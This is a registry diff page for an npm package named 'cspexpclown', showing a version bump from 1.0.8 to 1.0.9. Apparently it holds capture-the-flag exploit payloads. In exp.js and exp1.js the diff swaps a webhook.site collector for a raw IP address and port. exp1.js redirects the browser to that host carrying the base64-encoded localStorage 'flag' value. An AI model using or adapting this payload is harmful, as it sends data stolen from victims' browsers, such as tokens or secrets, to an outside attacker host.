cspexpclown 1.0.8 → 1.0.9

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/exp.js +1 -1
  2. package/exp1.js +1 -1
  3. package/package.json +1 -1
package/exp.js CHANGED
@@ -1,5 +1,5 @@
1
1
  (async () => {
2
- const domain = "https://webhook.site/78bd37ea-0ee3-4993-8b97-b607846ab241"; // 指定域名
2
+ const domain = "http://43.139.107.213:8888"; // 指定域名
3
3
 
4
4
  try {
5
5
 
package/exp1.js CHANGED
@@ -1 +1 @@
1
- window.location.href="https://webhook.site/78bd37ea-0ee3-4993-8b97-b607846ab241/?flag="+encodeURIComponent(btoa(localStorage.getItem("flag")));
1
+ window.location.href="http://43.139.107.213:8888/?flag="+encodeURIComponent(btoa(localStorage.getItem("flag")));
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cspexpclown",
3
- "version": "1.0.8",
3
+ "version": "1.0.9",
4
4
  "description": "csp",
5
5
  "main": "index.js",
6
6
  "scripts": {